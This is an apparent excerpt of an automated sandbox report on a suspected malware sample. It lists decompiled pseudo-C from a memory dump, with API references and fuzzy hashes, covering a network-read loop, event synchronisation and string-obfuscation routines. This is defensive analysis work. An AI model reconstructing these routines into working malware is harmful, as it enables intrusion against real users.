							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E03095AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03094A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0309A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















    0x03095d96
    0x03095da2
    0x03095da8
    0x03095dad
    0x03095db1
    0x03095f23
    0x03095f27
    0x03095f27
    0x03095db7
    0x03095dbb
    0x03095dc1
    0x03095dc2
    0x03095dcd
    0x03095dd3
    0x03095dd8
    0x03095ddb
    0x03095df5
    0x03095e04
    0x03095e10
    0x03095e1a
    0x03095e1f
    0x03095e21
    0x03095e24
    0x03095edb
    0x03095ee1
    0x03095ef2
    0x03095f05
    0x03095f1b
    0x00000000
    0x03095f20
    0x03095e2d
    0x03095e34
    0x03095e38
    0x03095e3e
    0x03095e40
    0x03095e42
    0x03095e44
    0x03095e46
    0x03095e50
    0x03095e55
    0x03095e57
    0x03095e59
    0x03095e5a
    0x03095e5b
    0x03095e5c
    0x03095e63
    0x03095e6a
    0x03095e6d
    0x03095e6d
    0x03095e3a
    0x03095e3a
    0x03095e3a
    0x03095e75
    0x03095e7d
    0x03095e89
    0x03095e8e
    0x03095e8e
    0x03095e93
    0x00000000
    0x00000000
    0x03095e95
    0x03095e98
    0x03095ea5
    0x00000000
    0x00000000
    0x03095ea7
    0x03095ea7
    0x03095eb4
    0x03095e8e
    0x03095e93
    0x00000000
    0x00000000
    0x00000000
    0x03095e93
    0x03095ebe
    0x03095ec1
    0x03095ec4
    0x03095ecb
    0x03095ecb
    0x03095ed8
    0x00000000
    0x03095ed8
    0x03095dc4
    0x03095dc8
    0x03095dc9
    0x03095dcb
    0x00000000
    0x00000000
    0x00000000
    0x03095dcb
    0x00000000

    APIs
    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03095E46
    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03095E5C
    • memset.NTDLL ref: 03095F05
    • memset.NTDLL ref: 03095F1B
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: memset$_allmul_aulldiv
    • String ID:
    • API String ID: 3041852380-0
    • Opcode ID: 4bb3206db59244a2877646db4dbe4ed6fc80f44a9a3de36f232886ea41559243
    • Instruction ID: c869cb5460c9f90266102f2bbd984bd6be6461a4022cc4f43607283f5bdbb6d3
    • Opcode Fuzzy Hash: 4bb3206db59244a2877646db4dbe4ed6fc80f44a9a3de36f232886ea41559243
    • Instruction Fuzzy Hash: C941B235A02219AFEF25DF69CC40BEE77B8EF86310F004566B819AB180DB719A449F80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030914A8, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 57%
    			E030914A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x309a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E03096837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x309a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E030950CA(_v20);
											if(_v8 == 0) {
												_v8 = E030937FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E030925C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























    0x030914a9
    0x030914af
    0x030914ba
    0x030914ba
    0x030914bc
    0x03095aff
    0x03095b02
    0x03095b0b
    0x03095b0e
    0x03095b11
    0x03095b19
    0x03095c17
    0x03095c22
    0x03095c25
    0x03095c27
    0x00000000
    0x03095c27
    0x03095b1f
    0x03095b22
    0x03095c2a
    0x03095c2a
    0x03095b28
    0x03095b2b
    0x03095b2c
    0x03095b2e
    0x03095b37
    0x03095c0e
    0x03095b3d
    0x03095b43
    0x03095b4a
    0x03095b4d
    0x03095bfc
    0x03095b53
    0x00000000
    0x03095b53
    0x03095b53
    0x03095b53
    0x03095b53
    0x03095b58
    0x03095b5a
    0x03095b5a
    0x03095b67
    0x03095b6f
    0x00000000
    0x00000000
    0x03095b71
    0x03095b7e
    0x03095b84
    0x03095b84
    0x03095b87
    0x00000000
    0x00000000
    0x03095b89
    0x03095b94
    0x03095ba8
    0x03095bde
    0x03095baa
    0x03095baa
    0x03095bb1
    0x03095bb9
    0x00000000
    0x03095bbb
    0x03095bbb
    0x03095bc6
    0x03095bc9
    0x03095bd0
    0x00000000
    0x03095bd0
    0x03095bc9
    0x03095bb9
    0x03095be1
    0x03095be4
    0x03095bec
    0x03095bf7
    0x03095bf7
    0x00000000
    0x03095bec
    0x03095b91
    0x00000000
    0x03095bd3
    0x03095bd3
    0x00000000
    0x03095bdc
    0x03095c03
    0x03095c03
    0x03095c09
    0x03095c09
    0x03095b37
    0x03095b22
    0x03095c34
    0x030914b1
    0x030914b1
    0x030914b8
    0x030914c3
    0x00000000
    0x00000000
    0x00000000
    0x030914b8

    APIs
    • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,03097134,00000000,?), ref: 03095B9B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,03097134,00000000,?,?), ref: 03095BBB
      • Part of subcall function 030925C7: wcstombs.NTDLL ref: 03092687
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: ErrorLastObjectSingleWaitwcstombs
    • String ID:
    • API String ID: 2344289193-0
    • Opcode ID: 51590718326da22feae5bb615de3ed22a85d5128d8fcdf5cdf5b188c54f5363c
    • Instruction ID: 7f57f008aaf8c8f17a609cd291a3693177452b3636ef95d4d813d85886eae58b
    • Opcode Fuzzy Hash: 51590718326da22feae5bb615de3ed22a85d5128d8fcdf5cdf5b188c54f5363c
    • Instruction Fuzzy Hash: AC414CB4902209EFEF21EFA5CD849EEB7B8FB45340F1444ABE412E7150E7349A44EB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
    Download Yara Rule
    APIs
    • SysAllocString.OLEAUT32(80000002), ref: 03095C8C
    • SysAllocString.OLEAUT32(03091E05), ref: 03095CCF
    • SysFreeString.OLEAUT32(00000000), ref: 03095CE3
    • SysFreeString.OLEAUT32(00000000), ref: 03095CF1
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: 6d74b62d6d90cee5c6b28a9aea760ba1f24b90457cfa5b843b1d2045f2208352
    • Instruction ID: abe8e600c55b43df1aebc540de6009ce7cd63645ea7261626833ef59de9463ea
    • Opcode Fuzzy Hash: 6d74b62d6d90cee5c6b28a9aea760ba1f24b90457cfa5b843b1d2045f2208352
    • Instruction Fuzzy Hash: 5C3139B1901209EFDF02DF99D8C48AEBBF9BF48300B10842FE90A97250D7359545DFA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030973C3, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E030973C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x309a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x309a2d4; // 0x3ccd5a8
				_t3 = _t8 + 0x309b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E03092DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x309a2f8, 1, 0, _t30);
					E030950CA(_t30);
				}
				_t12 =  *0x309a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0309513E() == 0) {
						_t28 =  *0x309a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E03096BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E030951A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}















    0x030973c4
    0x030973cb
    0x030973d5
    0x030973d9
    0x030973df
    0x030973ec
    0x030973f3
    0x030973f7
    0x03097409
    0x0309740b
    0x0309740b
    0x03097410
    0x03097417
    0x03097422
    0x03097438
    0x0309743c
    0x0309743e
    0x03097443
    0x03097443
    0x03097450
    0x03097454
    0x03097458
    0x00000000
    0x00000000
    0x03097466
    0x0309746a
    0x00000000
    0x00000000
    0x0309746a
    0x03097454
    0x00000000
    0x0309746c
    0x0309746c
    0x0309746c
    0x03097472
    0x03097474
    0x03097474
    0x0309747e
    0x03097482
    0x03097494
    0x03097494
    0x03097498
    0x0309749e
    0x0309749e
    0x030974a1
    0x030974a3
    0x030974a6
    0x030974a6
    0x030974ad
    0x030974b3
    0x030974b3

    APIs
      • Part of subcall function 03092DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,06D69C98,770CC740,030955DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,030955DE), ref: 03092E20
      • Part of subcall function 03092DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 03092E44
      • Part of subcall function 03092DEA: lstrcat.KERNEL32(00000000,00000000), ref: 03092E4C
    • CreateEventA.KERNEL32(0309A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,030930E1,?,?,?), ref: 03097402
      • Part of subcall function 030950CA: HeapFree.KERNEL32(00000000,00000000,03094239,00000000,00000001,?,00000000,?,?,?,03096B8D,00000000,?,00000001), ref: 030950D6
    • WaitForSingleObject.KERNEL32(00000000,00004E20,030930E1,00000000,?,00000000,?,030930E1,?,?,?,?,?,?,?,0309211B), ref: 03097460
    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,030930E1,?,?,?), ref: 0309748E
    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,030930E1,?,?,?), ref: 030974A6
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
    • String ID:
    • API String ID: 73268831-0
    • Opcode ID: f73890909066641b0b8d93d8f67dd07d7b75a8491b6f8edba718edcd6d4308f1
    • Instruction ID: 8fb7d054f406ecb53406936f2f0f405e96850bd51061181779bf3cc37ed90df5
    • Opcode Fuzzy Hash: f73890909066641b0b8d93d8f67dd07d7b75a8491b6f8edba718edcd6d4308f1
    • Instruction Fuzzy Hash: 3421E6336533129BFF61EB688C44B5BBAE8BB89F60F090227FD819F642D775D8009640
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03093032, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
    Download Yara Rule
    C-Code - Quality: 39%
    			E03093032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E03096710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E030915B9(_t23);
						}
					}
					return _t38;
				}
				if(E03094C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x309a2f8, 1, 0,  *0x309a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E03094039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03091D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03093C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E030973C3( &_v32, _t39);
					goto L13;
				}
			}












    0x03093032
    0x0309303f
    0x03093045
    0x03093046
    0x03093047
    0x03093048
    0x03093049
    0x0309304d
    0x03093059
    0x0309305d
    0x030930e5
    0x030930e5
    0x030930e8
    0x030930ea
    0x030930f2
    0x030930f8
    0x030930fb
    0x030930fb
    0x030930f8
    0x03093106
    0x03093106
    0x03093070
    0x03093072
    0x03093072
    0x03093089
    0x0309308d
    0x03093090
    0x0309309b
    0x030930a2
    0x030930a2
    0x030930ae
    0x030930af
    0x030930bd
    0x030930b1
    0x030930b1
    0x030930b2
    0x030930b3
    0x030930b4
    0x030930b5
    0x030930b6
    0x030930b6
    0x030930c2
    0x030930c7
    0x030930c9
    0x030930cb
    0x030930cb
    0x030930d2
    0x00000000
    0x030930d4
    0x030930d4
    0x030930e1
    0x00000000
    0x030930e1

    APIs
    • CreateEventA.KERNEL32(0309A2F8,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730,?,?,?,?,0309211B,?,00000001), ref: 03093083
    • SetEvent.KERNEL32(00000000,?,?,?,?,0309211B,?,00000001,0309560C,00000002,?,?,0309560C), ref: 03093090
    • Sleep.KERNEL32(00000BB8,?,?,?,?,0309211B,?,00000001,0309560C,00000002,?,?,0309560C), ref: 0309309B
    • CloseHandle.KERNEL32(00000000,?,?,?,?,0309211B,?,00000001,0309560C,00000002,?,?,0309560C), ref: 030930A2
      • Part of subcall function 03094039: WaitForSingleObject.KERNEL32(00000000,?,?,?,030930C2,?,030930C2,?,?,?,?,?,030930C2,?), ref: 03094113
      • Part of subcall function 03094039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,030930C2,?,?,?,?,?,0309211B,?), ref: 0309413B
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
    • String ID:
    • API String ID: 467273019-0
    • Opcode ID: 7e4730219e647b7fb6c6284cbda430be1e17175f65f72972db6908e9a764354d
    • Instruction ID: 9e237fc45a8547d2fe03b35d5c651b842ec6af927fab20a4bedea3177bd589e1
    • Opcode Fuzzy Hash: 7e4730219e647b7fb6c6284cbda430be1e17175f65f72972db6908e9a764354d
    • Instruction Fuzzy Hash: 2521C87AE02214AFEF10FFE588849EEB7BDAB84350B06446BE951E7100D735D9449FA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03094D09, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E03094D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03096837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














    0x03094d15
    0x03094d19
    0x03094d1a
    0x03094d1b
    0x03094d1d
    0x03094d1f
    0x03094d24
    0x03094d27
    0x03094dbe
    0x03094dc5
    0x03094dc5
    0x03094d30
    0x03094d37
    0x03094d47
    0x03094d47
    0x03094d4d
    0x03094d4f
    0x03094d54
    0x03094d5d
    0x03094d65
    0x03094d68
    0x03094d73
    0x03094d77
    0x03094d79
    0x03094d7a
    0x03094d83
    0x03094d87
    0x03094d98
    0x03094d89
    0x03094d8e
    0x03094d93
    0x03094da2
    0x03094da2
    0x03094d77
    0x03094da8
    0x03094dae
    0x03094dae
    0x03094db7
    0x03094dbc
    0x03094dbc
    0x00000000

    APIs
    • Sleep.KERNEL32(000000C8), ref: 03094D37
    • lstrlenW.KERNEL32(?), ref: 03094D6D
    • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 03094D8E
    • SysFreeString.OLEAUT32(?), ref: 03094DA2
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: FreeSleepStringlstrlenmemcpy
    • String ID:
    • API String ID: 1198164300-0
    • Opcode ID: 462d7f4de1681ecc2cf6dc4f8973da6df76ab409d383b3afd0401e61d639933b
    • Instruction ID: 1e6cc3385d4005bd449b4bb0f9b877d442921da4e10ee0cd7422c94afe0b8d15
    • Opcode Fuzzy Hash: 462d7f4de1681ecc2cf6dc4f8973da6df76ab409d383b3afd0401e61d639933b
    • Instruction Fuzzy Hash: 4C216079902219EFDF50DFA5C8849DEBBF8FF88311B1241AAE805D7210E731DA01DB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030952E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E030952E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x309a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x309a2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x309a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















    0x030952ed
    0x030952f0
    0x030952f6
    0x0309530e
    0x03095312
    0x03095315
    0x03095317
    0x0309531a
    0x0309531c
    0x0309531f
    0x03095321
    0x03095321
    0x03095323
    0x0309532e
    0x03095333
    0x03095344
    0x0309534c
    0x03095351
    0x03095354
    0x03095357
    0x03095359
    0x0309535f
    0x03095362
    0x03095362
    0x03095362
    0x0309536d
    0x03095372
    0x0309537c

    APIs
    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,030962E0,00000000,?,00000000,030970D9,00000000,06D69630), ref: 030952F0
    • RtlAllocateHeap.NTDLL(00000000,?), ref: 03095308
    • memcpy.NTDLL(00000000,06D69630,-00000008,?,?,?,030962E0,00000000,?,00000000,030970D9,00000000,06D69630), ref: 0309534C
    • memcpy.NTDLL(00000001,06D69630,00000001,030970D9,00000000,06D69630), ref: 0309536D
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: memcpy$AllocateHeaplstrlen
    • String ID:
    • API String ID: 1819133394-0
    • Opcode ID: defd455be107f757dda676f0994a371e8f600b8cf17c19520ab217b59df5a242
    • Instruction ID: ac224a2f46a88784ce910d41a481d20548af5daca571ae8d96c1c11d0d74ff78
    • Opcode Fuzzy Hash: defd455be107f757dda676f0994a371e8f600b8cf17c19520ab217b59df5a242
    • Instruction Fuzzy Hash: DA112C72A052147FDB11DF69DC84D9EBBFDEBC5260B090177F404DB150E6759910D790
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0309578C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
    Download Yara Rule
    C-Code - Quality: 53%
    			E0309578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E03096837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x30992a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x30992a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










    0x03095797
    0x0309579b
    0x0309579d
    0x0309579e
    0x030957a6
    0x030957a6
    0x030957aa
    0x00000000
    0x00000000
    0x030957a1
    0x030957a2
    0x030957a5
    0x030957a5
    0x030957b2
    0x030957b9
    0x030957bd
    0x030957c5
    0x030957cb
    0x030957cd
    0x030957d2
    0x030957d6
    0x030957d8
    0x030957db
    0x030957e2
    0x030957e2
    0x030957ec
    0x030957ef
    0x030957f2
    0x030957f2
    0x030957fe
    0x030957fe
    0x0309580b

    APIs
    • StrChrA.SHLWAPI(?,00000020,00000000,06D6962C,?,?,?,03091128,06D6962C,?,?,030955D3), ref: 030957A6
    • StrTrimA.SHLWAPI(?,030992A4,00000002,?,?,?,03091128,06D6962C,?,?,030955D3), ref: 030957C5
    • StrChrA.SHLWAPI(?,00000020,?,?,?,03091128,06D6962C,?,?,030955D3,?,?,?,?,?,03096BD8), ref: 030957D0
    • StrTrimA.SHLWAPI(00000001,030992A4,?,?,?,03091128,06D6962C,?,?,030955D3,?,?,?,?,?,03096BD8), ref: 030957E2
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Trim
    • String ID:
    • API String ID: 3043112668-0
    • Opcode ID: f26407e84ac91b6ff6df5831127e08e2c1f42e8dad06ab168c955f3b23a27f9f
    • Instruction ID: b9de7ebfef8ff5b66939824fa4adfad7a8e3d6e703d3eecc9c255aa5c4650ca8
    • Opcode Fuzzy Hash: f26407e84ac91b6ff6df5831127e08e2c1f42e8dad06ab168c955f3b23a27f9f
